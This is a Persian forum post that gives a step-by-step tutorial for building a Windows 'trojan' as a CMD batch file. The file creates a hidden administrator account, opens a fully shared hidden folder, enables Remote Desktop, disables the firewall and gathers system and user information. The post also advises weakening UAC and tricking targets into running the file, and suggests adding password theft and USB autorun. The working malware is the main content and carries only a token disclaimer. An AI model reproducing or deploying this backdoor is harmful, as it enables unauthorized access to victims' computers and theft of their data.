نمایش نتایج: از شماره 1 تا 2 , از مجموع 2

موضوع: آموزش ساخت Trojan با فرمان های CMD

Threaded View

پست قبلی پست قبلی   پست بعدی پست بعدی
  1. March 14th, 2016, 11:31 #1
    twinkle
    twinkle آنلاین نیست.
    عضو انجمن
    تاریخ عضویت
    Dec 2015
    محل سکونت
    رشت
    نوشته ها
    110
    تشکر تشکر کرده 
    3
    تشکر تشکر شده 
    61
    تشکر شده در
    35 پست

    پیش فرض آموزش ساخت Trojan با فرمان های CMD


    آموزش ساخت     Trojan با فرمان های CMD




    سلام به همه شما دوستان و همراهان همیشگی هیوا

    در این آموزش، می خواهیم با فرمان های CMD یک Trojan ساده و بی درد سر بسازیم. تروجان ما فقط یک سری اطلاعات را برای ما جمع آوری می کند و راه دسترسی به آن اطلاعات و اطلاعات دیگر را هم فراهم می کند. اگر دوست داشتید می توانید کارهای بیشتری را بر دوش این تروجان بگذارید. کل کارهایی که تروجان کوچولوی ما انجام می دهد به قرار زیر است:

    تروجان ما چه کارهایی انجام می دهد؟


    1. ایجاد یک User جدید با دسترسی Admin در کامپیوتر هدف
    2. ایجاد یک پوشه مخفی در درایو ویندوز و Share کردن آن به صورت مخفی با دسترسی User جدید.
    3. فعال کردن Sharing
    4. فعال سازی قابلیت Remote Desktop در کامپیوتر هدف
    5. خاموش کردن Password Protected File Sharing
    6. خاموش کردن فایروال
    7. جمع آوری اطلاعات کامپیوتر شامل موارد زیر:



    IP ،Computer Name ، MAC Address ، لیست کاربران، لیست منابع Share شده
    و انتقال آن ها به پوشه share شده در درایو ویندوز با نام همان کامپیوتر



    1. لیست برنامه های نصب شده و ورژن آن در کامپیوتر هدف


    قبل از شروع:

    مواردی که در این مقاله گفته شده فقط جنبه آموزشی دارد و استفاده نادرست از آن به عهده کاربر است.
    در این آموزش فقط از فرمان های CMD استفاده شده و از هیچ زبان برنامه نویسی و ابزار خاصی استفاده نشده است.

    شروع ساخت Trojan

    یک فایل Text ایجاد کنید و فرمان های زیر را در آن بنویسید:

    1 – ایجاد یک User جدید با دسترسی Admin
    Net user iman 123456 /add
    Net localgroup administrators iman /add

    2 – الف - ایجاد یک پوشه مخفی در درایو ویندوز
    Mkdir c:\Hiva-folder
    :C
    \cd
    attrib hiva-folder +h
    2 – ب – Share کردن آن پوشه به صورت مخفی
    net share trojan-share$=c:\hiva-folder /grant:iman,full /grant:everyone,full

    3 – فعال کردن File and Printer Sharing
    netsh firewall set service type = fileandprint mode =enable

    4 – فعال کردن Remote Desktop در کامپیوتر هدف
    netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    5 – به عهده شما ! ( می توانید این مورد را حذف کنید )

    6 – خاموش کردن فایروال
    Netsh advfirewall set allprofile state off

    7 – گرفتن اطلاعات IP ، MAC Address ، لیست کاربران، لیست منابع Share و SID اکانت Administrator

    ipconfig >>c:\Hiva-folder\%computername%.txt
    getmac >>c:\Hiva-folder\%computername%.txt
    net user >>c:\Hiva-folder\%computername%.txt
    net share >>c:\Hiva-folder\%computername%.txt
    wmic useraccount where name='administrator' get sid >>c:\Hiva-folder\%computername%.txt

    8 – لیست برنامه های نصب شده بر روی سیستم هدف

    Wmic product get name,version >> c:\Hiva-folder\%computername%.txt


    9 - خب حالا عبارت @echo off را در اولین خط این فایل text قرار دهید.

    10 - این فایل text را با نام dear-tro و پسوند .bat ذخیره کنید.

    نمایی از محتویات فایل dear-tro.bat در برنامه notepad++





    مرحله هیجان انگیز کار

    برای اطمینان از این که Trojan کار می کند، یک بار آن را اجرا می کنیم.



    همه فرمان ها با خطا روبرو می شوند!

    چرا این اتفاق افتاد؟

    چون فرمان هایی که در این Batch-file به کار بردیم برای اجرا شدن نیاز به دسترسی سطح Admin دارند.

    حالا برای حلش چه کار کنیم؟

    2 راه حل دارید!

    روش اول:Batch-file را در کامپیوتر هدف Run as administrator کنید:




    روش دوم:    UAC یا User Account Control را در پایین ترین سطح قرار دهید:


    1. در استارت عبارت UAC را جستجو کنید.
    2. Scroll را در پایین ترین سطح قرار دهید.







    1. کامپیوتر را یک بار Restart کنید.


    حالا دوباره آن را اجرا کنید!



    فرمان ها با موفقیت اجرا شدند!

    این یعنی اینکه:

    هم اکنون می توانید در کامپیوتر هدف،

    • فایروال را خاموش کنید
    • ریموت دسکتاپ را فعال کنید
    • یک اکانت کاربری با دسترسی Admin برای خودتان ایجاد کنید
    • یک پوشه Share شده با دسترسی کامل ایجاد کنید
    • لیست برنامه های نصب شده و ورژن آن را در برای خود بگیرید
    • لیست کاربران آن را داشته باشید و در صورت لزوم پسورد جدید برایشان قرار دهید!


    کل کاری که باید انجام دهید این است که هرجوری که شده این مینی تروجان را در کامپیوتر هدف منتقل و اجرا کنید! و این نکات را در نظر داشته باشید که:

    • بعضی از کاربران UAC خود را غیرفعال می کنند
    • بعضی از کاربران به سادگی حرف شما را می پذیرند
    • بعضی از کاربران سختگیر ترند
    • ممکن است 18 درصد احتمال موفقیت برایتان وجود داشته باشد


    و برای پیشرفته تر شدن تروجان کوچولو می توانید موارد زیر را به آن اضافه کنید:

    • Share کردن تمام Drive ها
    • گرفتن یک Copy از پسورد های ذخیره شده در ویندوز
    • Share کردن یک Folder در کامپیوتر خودتان و اتصال از کامپیوتر هدف به کامیپوتر خودتان و اجرا فرمان ها
    • قرار دادن این تروجان در Autorun یک Flash



    منبع : سایت هیوا شبکه
    پاسخ با نقل قول پاسخ با نقل قول

  2. تعداد تشکر ها از twinkle به دلیل پست مفید

    warlock
« موضوع قبلی | موضوع بعدی »

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. ویروس js/iframe trojan
    توسط persiansoftware در انجمن سوالات و مشکلات
    پاسخ ها: 10
    آخرين نوشته: May 8th, 2014, 20:24
  2. scan trojan
    توسط hraeissi در انجمن سوالات و مشکلات
    پاسخ ها: 0
    آخرين نوشته: May 19th, 2013, 12:20
  3. مشكل با NS/Redirector.NIL trojan (لطفا كمك كنيد)
    توسط pc30 در انجمن Wordpress
    پاسخ ها: 9
    آخرين نوشته: March 2nd, 2012, 12:00

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  

مشاهده قوانین انجمن